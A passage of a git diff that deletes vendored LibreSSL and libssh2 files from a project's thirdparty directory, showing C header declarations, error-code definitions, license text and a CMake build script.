-void X509_PURPOSE_cleanup(void);
-int X509_PURPOSE_get_id(X509_PURPOSE *);
-
-STACK_OF(OPENSSL_STRING) *X509_get1_email(X509 *x);
-STACK_OF(OPENSSL_STRING) *X509_REQ_get1_email(X509_REQ *x);
-void X509_email_free(STACK_OF(OPENSSL_STRING) *sk);
-STACK_OF(OPENSSL_STRING) *X509_get1_ocsp(X509 *x);
-
-/* Flags for X509_check_* functions */
-/* Always check subject name for host match even if subject alt names present */
-#define X509_CHECK_FLAG_ALWAYS_CHECK_SUBJECT	0x1
-/* Disable wildcard matching for dnsName fields and common name. */
-#define X509_CHECK_FLAG_NO_WILDCARDS	0x2
-/* Wildcards must not match a partial label. */
-#define X509_CHECK_FLAG_NO_PARTIAL_WILDCARDS 0x4
-/* Allow (non-partial) wildcards to match multiple labels. */
-#define X509_CHECK_FLAG_MULTI_LABEL_WILDCARDS 0x8
-/* Constraint verifier subdomain patterns to match a single labels. */
-#define X509_CHECK_FLAG_SINGLE_LABEL_SUBDOMAINS 0x10
-
-/*
- * Match reference identifiers starting with "." to any sub-domain.
- * This is a non-public flag, turned on implicitly when the subject
- * reference identity is a DNS name.
- */
-#define _X509_CHECK_FLAG_DOT_SUBDOMAINS 0x8000
-
-int X509_check_host(X509 *x, const char *chk, size_t chklen,
-    unsigned int flags, char **peername);
-int X509_check_email(X509 *x, const char *chk, size_t chklen,
-    unsigned int flags);
-int X509_check_ip(X509 *x, const unsigned char *chk, size_t chklen,
-    unsigned int flags);
-int X509_check_ip_asc(X509 *x, const char *ipasc, unsigned int flags);
-
-ASN1_OCTET_STRING *a2i_IPADDRESS(const char *ipasc);
-ASN1_OCTET_STRING *a2i_IPADDRESS_NC(const char *ipasc);
-int a2i_ipadd(unsigned char *ipout, const char *ipasc);
-int X509V3_NAME_from_section(X509_NAME *nm, STACK_OF(CONF_VALUE)*dn_sk,
-						unsigned long chtype);
-
-void X509_POLICY_NODE_print(BIO *out, X509_POLICY_NODE *node, int indent);
-DECLARE_STACK_OF(X509_POLICY_NODE)
-
-
-/* BEGIN ERROR CODES */
-/* The following lines are auto generated by the script mkerr.pl. Any changes
- * made after this point may be overwritten when the script is next run.
- */
-void ERR_load_X509V3_strings(void);
-
-/* Error codes for the X509V3 functions. */
-
-/* Function codes. */
-#define X509V3_F_A2I_GENERAL_NAME			 164
-#define X509V3_F_ASIDENTIFIERCHOICE_CANONIZE		 161
-#define X509V3_F_ASIDENTIFIERCHOICE_IS_CANONICAL	 162
-#define X509V3_F_COPY_EMAIL				 122
-#define X509V3_F_COPY_ISSUER				 123
-#define X509V3_F_DO_DIRNAME				 144
-#define X509V3_F_DO_EXT_CONF				 124
-#define X509V3_F_DO_EXT_I2D				 135
-#define X509V3_F_DO_EXT_NCONF				 151
-#define X509V3_F_DO_I2V_NAME_CONSTRAINTS		 148
-#define X509V3_F_GNAMES_FROM_SECTNAME			 156
-#define X509V3_F_HEX_TO_STRING				 111
-#define X509V3_F_I2S_ASN1_ENUMERATED			 121
-#define X509V3_F_I2S_ASN1_IA5STRING			 149
-#define X509V3_F_I2S_ASN1_INTEGER			 120
-#define X509V3_F_I2V_AUTHORITY_INFO_ACCESS		 138
-#define X509V3_F_NOTICE_SECTION				 132
-#define X509V3_F_NREF_NOS				 133
-#define X509V3_F_POLICY_SECTION				 131
-#define X509V3_F_PROCESS_PCI_VALUE			 150
-#define X509V3_F_R2I_CERTPOL				 130
-#define X509V3_F_R2I_PCI				 155
-#define X509V3_F_S2I_ASN1_IA5STRING			 100
-#define X509V3_F_S2I_ASN1_INTEGER			 108
-#define X509V3_F_S2I_ASN1_OCTET_STRING			 112
-#define X509V3_F_S2I_ASN1_SKEY_ID			 114
-#define X509V3_F_S2I_SKEY_ID				 115
-#define X509V3_F_SET_DIST_POINT_NAME			 158
-#define X509V3_F_STRING_TO_HEX				 113
-#define X509V3_F_SXNET_ADD_ID_ASC			 125
-#define X509V3_F_SXNET_ADD_ID_INTEGER			 126
-#define X509V3_F_SXNET_ADD_ID_ULONG			 127
-#define X509V3_F_SXNET_GET_ID_ASC			 128
-#define X509V3_F_SXNET_GET_ID_ULONG			 129
-#define X509V3_F_V2I_ASIDENTIFIERS			 163
-#define X509V3_F_V2I_ASN1_BIT_STRING			 101
-#define X509V3_F_V2I_AUTHORITY_INFO_ACCESS		 139
-#define X509V3_F_V2I_AUTHORITY_KEYID			 119
-#define X509V3_F_V2I_BASIC_CONSTRAINTS			 102
-#define X509V3_F_V2I_CRLD				 134
-#define X509V3_F_V2I_EXTENDED_KEY_USAGE			 103
-#define X509V3_F_V2I_GENERAL_NAMES			 118
-#define X509V3_F_V2I_GENERAL_NAME_EX			 117
-#define X509V3_F_V2I_IDP				 157
-#define X509V3_F_V2I_IPADDRBLOCKS			 159
-#define X509V3_F_V2I_ISSUER_ALT				 153
-#define X509V3_F_V2I_NAME_CONSTRAINTS			 147
-#define X509V3_F_V2I_POLICY_CONSTRAINTS			 146
-#define X509V3_F_V2I_POLICY_MAPPINGS			 145
-#define X509V3_F_V2I_SUBJECT_ALT			 154
-#define X509V3_F_V3_ADDR_VALIDATE_PATH_INTERNAL		 160
-#define X509V3_F_V3_GENERIC_EXTENSION			 116
-#define X509V3_F_X509V3_ADD1_I2D			 140
-#define X509V3_F_X509V3_ADD_VALUE			 105
-#define X509V3_F_X509V3_EXT_ADD				 104
-#define X509V3_F_X509V3_EXT_ADD_ALIAS			 106
-#define X509V3_F_X509V3_EXT_CONF			 107
-#define X509V3_F_X509V3_EXT_I2D				 136
-#define X509V3_F_X509V3_EXT_NCONF			 152
-#define X509V3_F_X509V3_GET_SECTION			 142
-#define X509V3_F_X509V3_GET_STRING			 143
-#define X509V3_F_X509V3_GET_VALUE_BOOL			 110
-#define X509V3_F_X509V3_PARSE_LIST			 109
-#define X509V3_F_X509_PURPOSE_ADD			 137
-#define X509V3_F_X509_PURPOSE_SET			 141
-
-/* Reason codes. */
-#define X509V3_R_BAD_IP_ADDRESS				 118
-#define X509V3_R_BAD_OBJECT				 119
-#define X509V3_R_BN_DEC2BN_ERROR			 100
-#define X509V3_R_BN_TO_ASN1_INTEGER_ERROR		 101
-#define X509V3_R_DIRNAME_ERROR				 149
-#define X509V3_R_DISTPOINT_ALREADY_SET			 160
-#define X509V3_R_DUPLICATE_ZONE_ID			 133
-#define X509V3_R_ERROR_CONVERTING_ZONE			 131
-#define X509V3_R_ERROR_CREATING_EXTENSION		 144
-#define X509V3_R_ERROR_IN_EXTENSION			 128
-#define X509V3_R_EXPECTED_A_SECTION_NAME		 137
-#define X509V3_R_EXTENSION_EXISTS			 145
-#define X509V3_R_EXTENSION_NAME_ERROR			 115
-#define X509V3_R_EXTENSION_NOT_FOUND			 102
-#define X509V3_R_EXTENSION_SETTING_NOT_SUPPORTED	 103
-#define X509V3_R_EXTENSION_VALUE_ERROR			 116
-#define X509V3_R_ILLEGAL_EMPTY_EXTENSION		 151
-#define X509V3_R_ILLEGAL_HEX_DIGIT			 113
-#define X509V3_R_INCORRECT_POLICY_SYNTAX_TAG		 152
-#define X509V3_R_INVALID_MULTIPLE_RDNS			 161
-#define X509V3_R_INVALID_ASNUMBER			 162
-#define X509V3_R_INVALID_ASRANGE			 163
-#define X509V3_R_INVALID_BOOLEAN_STRING			 104
-#define X509V3_R_INVALID_EXTENSION_STRING		 105
-#define X509V3_R_INVALID_INHERITANCE			 165
-#define X509V3_R_INVALID_IPADDRESS			 166
-#define X509V3_R_INVALID_NAME				 106
-#define X509V3_R_INVALID_NULL_ARGUMENT			 107
-#define X509V3_R_INVALID_NULL_NAME			 108
-#define X509V3_R_INVALID_NULL_VALUE			 109
-#define X509V3_R_INVALID_NUMBER				 140
-#define X509V3_R_INVALID_NUMBERS			 141
-#define X509V3_R_INVALID_OBJECT_IDENTIFIER		 110
-#define X509V3_R_INVALID_OPTION				 138
-#define X509V3_R_INVALID_POLICY_IDENTIFIER		 134
-#define X509V3_R_INVALID_PROXY_POLICY_SETTING		 153
-#define X509V3_R_INVALID_PURPOSE			 146
-#define X509V3_R_INVALID_SAFI				 164
-#define X509V3_R_INVALID_SECTION			 135
-#define X509V3_R_INVALID_SYNTAX				 143
-#define X509V3_R_ISSUER_DECODE_ERROR			 126
-#define X509V3_R_MISSING_VALUE				 124
-#define X509V3_R_NEED_ORGANIZATION_AND_NUMBERS		 142
-#define X509V3_R_NO_CONFIG_DATABASE			 136
-#define X509V3_R_NO_ISSUER_CERTIFICATE			 121
-#define X509V3_R_NO_ISSUER_DETAILS			 127
-#define X509V3_R_NO_POLICY_IDENTIFIER			 139
-#define X509V3_R_NO_PROXY_CERT_POLICY_LANGUAGE_DEFINED	 154
-#define X509V3_R_NO_PUBLIC_KEY				 114
-#define X509V3_R_NO_SUBJECT_DETAILS			 125
-#define X509V3_R_ODD_NUMBER_OF_DIGITS			 112
-#define X509V3_R_OPERATION_NOT_DEFINED			 148
-#define X509V3_R_OTHERNAME_ERROR			 147
-#define X509V3_R_POLICY_LANGUAGE_ALREADY_DEFINED	 155
-#define X509V3_R_POLICY_PATH_LENGTH			 156
-#define X509V3_R_POLICY_PATH_LENGTH_ALREADY_DEFINED	 157
-#define X509V3_R_POLICY_SYNTAX_NOT_CURRENTLY_SUPPORTED	 158
-#define X509V3_R_POLICY_WHEN_PROXY_LANGUAGE_REQUIRES_NO_POLICY 159
-#define X509V3_R_SECTION_NOT_FOUND			 150
-#define X509V3_R_UNABLE_TO_GET_ISSUER_DETAILS		 122
-#define X509V3_R_UNABLE_TO_GET_ISSUER_KEYID		 123
-#define X509V3_R_UNKNOWN_BIT_STRING_ARGUMENT		 111
-#define X509V3_R_UNKNOWN_EXTENSION			 129
-#define X509V3_R_UNKNOWN_EXTENSION_NAME			 130
-#define X509V3_R_UNKNOWN_OPTION				 120
-#define X509V3_R_UNSUPPORTED_OPTION			 117
-#define X509V3_R_UNSUPPORTED_TYPE			 167
-#define X509V3_R_USER_TOO_LONG				 132
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/tls.h b/thirdparty/libressl/include/tls.h
deleted file mode 100644
index 3c83acd..0000000
--- a/thirdparty/libressl/include/tls.h
+++ /dev/null
@@ -1,218 +0,0 @@
-/* $OpenBSD: tls.h,v 1.51 2017/08/10 18:18:30 jsing Exp $ */
-/*
- * Copyright (c) 2014 Joel Sing <jsing@openbsd.org>
- *
- * Permission to use, copy, modify, and distribute this software for any
- * purpose with or without fee is hereby granted, provided that the above
- * copyright notice and this permission notice appear in all copies.
- *
- * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
- * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
- * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
- * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
- * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
- * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
- * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
- */
-
-#ifndef HEADER_TLS_H
-#define HEADER_TLS_H
-
-#ifdef __cplusplus
-extern "C" {
-#endif
-
-#ifdef _MSC_VER
-#ifndef LIBRESSL_INTERNAL
-#include <basetsd.h>
-typedef SSIZE_T ssize_t;
-#endif
-#endif
-
-#include <sys/types.h>
-
-#include <stddef.h>
-#include <stdint.h>
-
-#define TLS_API	20170126
-
-#define TLS_PROTOCOL_TLSv1_0	(1 << 1)
-#define TLS_PROTOCOL_TLSv1_1	(1 << 2)
-#define TLS_PROTOCOL_TLSv1_2	(1 << 3)
-#define TLS_PROTOCOL_TLSv1 \
-	(TLS_PROTOCOL_TLSv1_0|TLS_PROTOCOL_TLSv1_1|TLS_PROTOCOL_TLSv1_2)
-
-#define TLS_PROTOCOLS_ALL TLS_PROTOCOL_TLSv1
-#define TLS_PROTOCOLS_DEFAULT TLS_PROTOCOL_TLSv1_2
-
-#define TLS_WANT_POLLIN		-2
-#define TLS_WANT_POLLOUT	-3
-
-/* RFC 6960 Section 2.3 */
-#define TLS_OCSP_RESPONSE_SUCCESSFUL		0
-#define TLS_OCSP_RESPONSE_MALFORMED		1
-#define TLS_OCSP_RESPONSE_INTERNALERROR		2
-#define TLS_OCSP_RESPONSE_TRYLATER		3
-#define TLS_OCSP_RESPONSE_SIGREQUIRED		4
-#define TLS_OCSP_RESPONSE_UNAUTHORIZED		5
-
-/* RFC 6960 Section 2.2 */
-#define TLS_OCSP_CERT_GOOD			0
-#define TLS_OCSP_CERT_REVOKED			1
-#define TLS_OCSP_CERT_UNKNOWN			2
-
-/* RFC 5280 Section 5.3.1 */
-#define TLS_CRL_REASON_UNSPECIFIED		0
-#define TLS_CRL_REASON_KEY_COMPROMISE		1
-#define TLS_CRL_REASON_CA_COMPROMISE		2
-#define TLS_CRL_REASON_AFFILIATION_CHANGED	3
-#define TLS_CRL_REASON_SUPERSEDED		4
-#define TLS_CRL_REASON_CESSATION_OF_OPERATION	5
-#define TLS_CRL_REASON_CERTIFICATE_HOLD		6
-#define TLS_CRL_REASON_REMOVE_FROM_CRL		8
-#define TLS_CRL_REASON_PRIVILEGE_WITHDRAWN	9
-#define TLS_CRL_REASON_AA_COMPROMISE		10
-
-#define TLS_MAX_SESSION_ID_LENGTH		32
-#define TLS_TICKET_KEY_SIZE			48
-
-struct tls;
-struct tls_config;
-
-typedef ssize_t (*tls_read_cb)(struct tls *_ctx, void *_buf, size_t _buflen,
-    void *_cb_arg);
-typedef ssize_t (*tls_write_cb)(struct tls *_ctx, const void *_buf,
-    size_t _buflen, void *_cb_arg);
-
-int tls_init(void);
-
-const char *tls_config_error(struct tls_config *_config);
-const char *tls_error(struct tls *_ctx);
-
-struct tls_config *tls_config_new(void);
-void tls_config_free(struct tls_config *_config);
-
-int tls_config_add_keypair_file(struct tls_config *_config,
-    const char *_cert_file, const char *_key_file);
-int tls_config_add_keypair_mem(struct tls_config *_config, const uint8_t *_cert,
-    size_t _cert_len, const uint8_t *_key, size_t _key_len);
-int tls_config_add_keypair_ocsp_file(struct tls_config *_config,
-    const char *_cert_file, const char *_key_file,
-    const char *_ocsp_staple_file);
-int tls_config_add_keypair_ocsp_mem(struct tls_config *_config, const uint8_t *_cert,
-    size_t _cert_len, const uint8_t *_key, size_t _key_len,
-    const uint8_t *_staple, size_t _staple_len);
-int tls_config_set_alpn(struct tls_config *_config, const char *_alpn);
-int tls_config_set_ca_file(struct tls_config *_config, const char *_ca_file);
-int tls_config_set_ca_path(struct tls_config *_config, const char *_ca_path);
-int tls_config_set_ca_mem(struct tls_config *_config, const uint8_t *_ca,
-    size_t _len);
-int tls_config_set_cert_file(struct tls_config *_config,
-    const char *_cert_file);
-int tls_config_set_cert_mem(struct tls_config *_config, const uint8_t *_cert,
-    size_t _len);
-int tls_config_set_ciphers(struct tls_config *_config, const char *_ciphers);
-int tls_config_set_crl_file(struct tls_config *_config, const char *_crl_file);
-int tls_config_set_crl_mem(struct tls_config *_config, const uint8_t *_crl,
-    size_t _len);
-int tls_config_set_dheparams(struct tls_config *_config, const char *_params);
-int tls_config_set_ecdhecurve(struct tls_config *_config, const char *_curve);
-int tls_config_set_ecdhecurves(struct tls_config *_config, const char *_curves);
-int tls_config_set_key_file(struct tls_config *_config, const char *_key_file);
-int tls_config_set_key_mem(struct tls_config *_config, const uint8_t *_key,
-    size_t _len);
-int tls_config_set_keypair_file(struct tls_config *_config,
-    const char *_cert_file, const char *_key_file);
-int tls_config_set_keypair_mem(struct tls_config *_config, const uint8_t *_cert,
-    size_t _cert_len, const uint8_t *_key, size_t _key_len);
-int tls_config_set_keypair_ocsp_file(struct tls_config *_config,
-    const char *_cert_file, const char *_key_file, const char *_staple_file);
-int tls_config_set_keypair_ocsp_mem(struct tls_config *_config, const uint8_t *_cert,
-    size_t _cert_len, const uint8_t *_key, size_t _key_len,
-    const uint8_t *_staple, size_t staple_len);
-int tls_config_set_ocsp_staple_mem(struct tls_config *_config,
-    const uint8_t *_staple, size_t _len);
-int tls_config_set_ocsp_staple_file(struct tls_config *_config,
-    const char *_staple_file);
-int tls_config_set_protocols(struct tls_config *_config, uint32_t _protocols);
-int tls_config_set_verify_depth(struct tls_config *_config, int _verify_depth);
-
-void tls_config_prefer_ciphers_client(struct tls_config *_config);
-void tls_config_prefer_ciphers_server(struct tls_config *_config);
-
-void tls_config_insecure_noverifycert(struct tls_config *_config);
-void tls_config_insecure_noverifyname(struct tls_config *_config);
-void tls_config_insecure_noverifytime(struct tls_config *_config);
-void tls_config_verify(struct tls_config *_config);
-
-void tls_config_ocsp_require_stapling(struct tls_config *_config);
-void tls_config_verify_client(struct tls_config *_config);
-void tls_config_verify_client_optional(struct tls_config *_config);
-
-void tls_config_clear_keys(struct tls_config *_config);
-int tls_config_parse_protocols(uint32_t *_protocols, const char *_protostr);
-
-int tls_config_set_session_id(struct tls_config *_config,
-    const unsigned char *_session_id, size_t _len);
-int tls_config_set_session_lifetime(struct tls_config *_config, int _lifetime);
-int tls_config_add_ticket_key(struct tls_config *_config, uint32_t _keyrev,
-    unsigned char *_key, size_t _keylen);
-
-struct tls *tls_client(void);
-struct tls *tls_server(void);
-int tls_configure(struct tls *_ctx, struct tls_config *_config);
-void tls_reset(struct tls *_ctx);
-void tls_free(struct tls *_ctx);
-
-int tls_accept_fds(struct tls *_ctx, struct tls **_cctx, int _fd_read,
-    int _fd_write);
-int tls_accept_socket(struct tls *_ctx, struct tls **_cctx, int _socket);
-int tls_accept_cbs(struct tls *_ctx, struct tls **_cctx,
-    tls_read_cb _read_cb, tls_write_cb _write_cb, void *_cb_arg);
-int tls_connect(struct tls *_ctx, const char *_host, const char *_port);
-int tls_connect_fds(struct tls *_ctx, int _fd_read, int _fd_write,
-    const char *_servername);
-int tls_connect_servername(struct tls *_ctx, const char *_host,
-    const char *_port, const char *_servername);
-int tls_connect_socket(struct tls *_ctx, int _s, const char *_servername);
-int tls_connect_cbs(struct tls *_ctx, tls_read_cb _read_cb,
-    tls_write_cb _write_cb, void *_cb_arg, const char *_servername);
-int tls_handshake(struct tls *_ctx);
-ssize_t tls_read(struct tls *_ctx, void *_buf, size_t _buflen);
-ssize_t tls_write(struct tls *_ctx, const void *_buf, size_t _buflen);
-int tls_close(struct tls *_ctx);
-
-int tls_peer_cert_provided(struct tls *_ctx);
-int tls_peer_cert_contains_name(struct tls *_ctx, const char *_name);
-
-const char *tls_peer_cert_hash(struct tls *_ctx);
-const char *tls_peer_cert_issuer(struct tls *_ctx);
-const char *tls_peer_cert_subject(struct tls *_ctx);
-time_t	tls_peer_cert_notbefore(struct tls *_ctx);
-time_t	tls_peer_cert_notafter(struct tls *_ctx);
-const uint8_t *tls_peer_cert_chain_pem(struct tls *_ctx, size_t *_len);
-
-const char *tls_conn_alpn_selected(struct tls *_ctx);
-const char *tls_conn_cipher(struct tls *_ctx);
-const char *tls_conn_servername(struct tls *_ctx);
-const char *tls_conn_version(struct tls *_ctx);
-
-uint8_t *tls_load_file(const char *_file, size_t *_len, char *_password);
-void tls_unload_file(uint8_t *_buf, size_t len);
-
-int tls_ocsp_process_response(struct tls *_ctx, const unsigned char *_response,
-    size_t _size);
-int tls_peer_ocsp_cert_status(struct tls *_ctx);
-int tls_peer_ocsp_crl_reason(struct tls *_ctx);
-time_t tls_peer_ocsp_next_update(struct tls *_ctx);
-int tls_peer_ocsp_response_status(struct tls *_ctx);
-const char *tls_peer_ocsp_result(struct tls *_ctx);
-time_t tls_peer_ocsp_revocation_time(struct tls *_ctx);
-time_t tls_peer_ocsp_this_update(struct tls *_ctx);
-const char *tls_peer_ocsp_url(struct tls *_ctx);
-
-#ifdef __cplusplus
-}
-#endif
-
-#endif /* HEADER_TLS_H */
diff --git a/thirdparty/libssh2/CMakeLists.txt b/thirdparty/libssh2/CMakeLists.txt
deleted file mode 100644
index a49d808..0000000
--- a/thirdparty/libssh2/CMakeLists.txt
+++ /dev/null
@@ -1,109 +0,0 @@
-# Copyright (c) 2014, 2015  Alexander Lamaison <alexander.lamaison@gmail.com>
-#
-# Redistribution and use in source and binary forms,
-# with or without modification, are permitted provided
-# that the following conditions are met:
-#
-#   Redistributions of source code must retain the above
-#   copyright notice, this list of conditions and the
-#   following disclaimer.
-#
-#   Redistributions in binary form must reproduce the above
-#   copyright notice, this list of conditions and the following
-#   disclaimer in the documentation and/or other materials
-#   provided with the distribution.
-#
-#   Neither the name of the copyright holder nor the names
-#   of any other contributors may be used to endorse or
-#   promote products derived from this software without
-#   specific prior written permission.
-#
-# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
-# CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
-# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
-# OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
-# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
-# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
-# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
-# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
-# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
-# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
-# USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY
-# OF SUCH DAMAGE.
-
-cmake_minimum_required(VERSION 2.8.11)
-
-list(APPEND CMAKE_MODULE_PATH ${CMAKE_CURRENT_SOURCE_DIR}/cmake)
-
-project(libssh2 C)
-set(PROJECT_URL "https://www.libssh2.org/")
-set(PROJECT_DESCRIPTION "The SSH library")
-
-if (CMAKE_VERSION VERSION_LESS "3.1")
-  if (CMAKE_C_COMPILER_ID STREQUAL "GNU")
-    set (CMAKE_C_FLAGS "--std=gnu90 ${CMAKE_C_FLAGS}")
-  endif()
-else()
-  set (CMAKE_C_STANDARD 90)
-endif()
-
-option(BUILD_SHARED_LIBS "Build Shared Libraries" OFF)
-
-# Parse version
-
-file(READ ${CMAKE_CURRENT_SOURCE_DIR}/include/libssh2.h _HEADER_CONTENTS)
-string(
-  REGEX REPLACE ".*#define LIBSSH2_VERSION[ \t]+\"([^\"]+)\".*" "\\1"
-  LIBSSH2_VERSION "${_HEADER_CONTENTS}")
-string(
-  REGEX REPLACE ".*#define LIBSSH2_VERSION_MAJOR[ \t]+([0-9]+).*" "\\1"
-  LIBSSH2_VERSION_MAJOR "${_HEADER_CONTENTS}")
-string(
-  REGEX REPLACE ".*#define LIBSSH2_VERSION_MINOR[ \t]+([0-9]+).*" "\\1"
-  LIBSSH2_VERSION_MINOR "${_HEADER_CONTENTS}")
-string(
-  REGEX REPLACE ".*#define LIBSSH2_VERSION_PATCH[ \t]+([0-9]+).*" "\\1"
-  LIBSSH2_VERSION_PATCH "${_HEADER_CONTENTS}")
-
-if(NOT LIBSSH2_VERSION OR
-   NOT LIBSSH2_VERSION_MAJOR MATCHES "^[0-9]+$" OR
-   NOT LIBSSH2_VERSION_MINOR MATCHES "^[0-9]+$" OR
-   NOT LIBSSH2_VERSION_PATCH MATCHES "^[0-9]+$")
-  message(
-    FATAL_ERROR
-    "Unable to parse version from"
-    "${CMAKE_CURRENT_SOURCE_DIR}/include/libssh2.h")
-endif()
-
-include(GNUInstallDirs)
-install(
-  FILES docs/AUTHORS COPYING docs/HACKING README RELEASE-NOTES NEWS
-  DESTINATION ${CMAKE_INSTALL_DOCDIR})
-
-include(max_warnings)
-include(FeatureSummary)
-
-add_subdirectory(src)
-
-option(BUILD_EXAMPLES "Build libssh2 examples" ON)
-if(BUILD_EXAMPLES)
-  add_subdirectory(example)
-endif()
-
-option(BUILD_TESTING "Build libssh2 test suite" ON)
-if(BUILD_TESTING)
-  enable_testing()
-  add_subdirectory(tests)
-endif()
-
-add_subdirectory(docs)
-
-feature_summary(WHAT ALL)
-
-set(CPACK_PACKAGE_VERSION_MAJOR ${LIBSSH2_VERSION_MAJOR})
-set(CPACK_PACKAGE_VERSION_MINOR ${LIBSSH2_VERSION_MINOR})
-set(CPACK_PACKAGE_VERSION_PATCH ${LIBSSH2_VERSION_PATCH})
-set(CPACK_PACKAGE_VERSION ${LIBSSH2_VERSION})
-include(CPack)
diff --git a/thirdparty/libssh2/include/libssh2.h b/thirdparty/libssh2/include/libssh2.h
deleted file mode 100644
index 9ef9ff1..0000000
--- a/thirdparty/libssh2/include/libssh2.h
+++ /dev/null
@@ -1,1294 +0,0 @@
-/* Copyright (c) 2004-2009, Sara Golemon <sarag@libssh2.org>
- * Copyright (c) 2009-2015 Daniel Stenberg
- * Copyright (c) 2010 Simon Josefsson <simon@josefsson.org>
- * All rights reserved.
- *
- * Redistribution and use in source and binary forms,
- * with or without modification, are permitted provided
- * that the following conditions are met:
- *
- *   Redistributions of source code must retain the above
- *   copyright notice, this list of conditions and the
- *   following disclaimer.
- *
- *   Redistributions in binary form must reproduce the above
- *   copyright notice, this list of conditions and the following
- *   disclaimer in the documentation and/or other materials
- *   provided with the distribution.
- *
- *   Neither the name of the copyright holder nor the names
- *   of any other contributors may be used to endorse or
- *   promote products derived from this software without
- *   specific prior written permission.
- *
- * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
- * CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
- * INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
- * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
- * CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
- * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
- * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
- * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
- * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
- * NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
- * USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY
- * OF SUCH DAMAGE.
- */
-
-#ifndef LIBSSH2_H
-#define LIBSSH2_H 1
-
-#define LIBSSH2_COPYRIGHT "2004-2016 The libssh2 project and its contributors."
-
-/* We use underscore instead of dash when appending DEV in dev versions just
-   to make the BANNER define (used by src/session.c) be a valid SSH
-   banner. Release versions have no appended strings and may of course not
-   have dashes either. */
-#define LIBSSH2_VERSION                             "1.7.0_DEV"
-
-/* The numeric version number is also available "in parts" by using these
-   defines: */
-#define LIBSSH2_VERSION_MAJOR                       1
-#define LIBSSH2_VERSION_MINOR                       7
-#define LIBSSH2_VERSION_PATCH                       0
-
-/* This is the numeric version of the libssh2 version number, meant for easier
-   parsing and comparions by programs. The LIBSSH2_VERSION_NUM define will
-   always follow this syntax:
-
-         0xXXYYZZ
-
-   Where XX, YY and ZZ are the main version, release and patch numbers in
-   hexadecimal (using 8 bits each). All three numbers are always represented
-   using two digits.  1.2 would appear as "0x010200" while version 9.11.7
-   appears as "0x090b07".
-
-   This 6-digit (24 bits) hexadecimal number does not show pre-release number,
-   and it is always a greater number in a more recent release. It makes
-   comparisons with greater than and less than work.
-*/
-#define LIBSSH2_VERSION_NUM                         0x010700
-
-/*
- * This is the date and time when the full source package was created. The
- * timestamp is not stored in the source code repo, as the timestamp is
- * properly set in the tarballs by the maketgz script.
- *
- * The format of the date should follow this template:
- *
- * "Mon Feb 12 11:35:33 UTC 2007"
- */
-#define LIBSSH2_TIMESTAMP "DEV"
-
-#ifndef RC_INVOKED
-
-#ifdef __cplusplus
-extern "C" {
-#endif
-#ifdef _WIN32
-# include <basetsd.h>
-# include <winsock2.h>
-#endif
-
-#include <stddef.h>
-#include <string.h>
-#include <sys/stat.h>
-#include <sys/types.h>
-
-/* Allow alternate API prefix from CFLAGS or calling app */
-#ifndef LIBSSH2_API
-# ifdef LIBSSH2_WIN32
-#  ifdef _WINDLL
-#   ifdef LIBSSH2_LIBRARY
-#    define LIBSSH2_API __declspec(dllexport)
-#   else
-#    define LIBSSH2_API __declspec(dllimport)
-#   endif /* LIBSSH2_LIBRARY */
-#  else
-#   define LIBSSH2_API
-#  endif
-# else /* !LIBSSH2_WIN32 */
-#  define LIBSSH2_API
-# endif /* LIBSSH2_WIN32 */
-#endif /* LIBSSH2_API */
-
-#ifdef HAVE_SYS_UIO_H
-# include <sys/uio.h>
-#endif
-
-#if (defined(NETWARE) && !defined(__NOVELL_LIBC__))
-# include <sys/bsdskt.h>
-typedef unsigned char uint8_t;
-typedef unsigned int uint32_t;
-#endif
-
-#ifdef _MSC_VER
-typedef unsigned char uint8_t;
-typedef unsigned int uint32_t;
-typedef unsigned __int64 libssh2_uint64_t;
-typedef __int64 libssh2_int64_t;
-#ifndef ssize_t
-typedef SSIZE_T ssize_t;
-#endif
-#else
-typedef unsigned long long libssh2_uint64_t;
-typedef long long libssh2_int64_t;
-#endif
-
-#ifdef WIN32
-typedef SOCKET libssh2_socket_t;
-#define LIBSSH2_INVALID_SOCKET INVALID_SOCKET
